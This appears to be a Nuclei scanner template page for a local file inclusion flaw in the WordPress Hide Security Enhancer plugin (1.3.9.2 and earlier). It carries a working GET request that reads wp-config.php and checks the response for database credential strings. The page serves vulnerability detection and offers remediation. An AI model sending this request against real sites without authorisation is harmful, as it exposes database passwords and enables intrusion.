WordPress Hide Security Enhancer 1.3.9.2 Local File Inclusion
ID: hide-security-enhancer-lfi
Severity: high
Author: dhiyaneshDK
Tags: wordpress,wp-plugin,lfi,wp
Description
Section titled “Description”WordPress Hide Security Enhancer version 1.3.9.2 or less is susceptible to a local file inclusion vulnerability which could allow malicious visitors to download any file in the installation.
YAML Source
Section titled “YAML Source”id: hide-security-enhancer-lfi
info: name: WordPress Hide Security Enhancer 1.3.9.2 Local File Inclusion author: dhiyaneshDK severity: high description: WordPress Hide Security Enhancer version 1.3.9.2 or less is susceptible to a local file inclusion vulnerability which could allow malicious visitors to download any file in the installation. remediation: Upgrade to version 1.4 or later. reference: - https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 metadata: max-request: 1 tags: wordpress,wp-plugin,lfi,wp
http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php'
matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" condition: and
- type: status status: - 200# digest: 490a00463044022072efc8740706a08c92a0ffbff752444e7ec98a0bc0613e58349cd43dd6d563940220369a73a5e5e692951b04ff5abbfd68c69e7b16f200a24543ce349c5f144420c5:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml"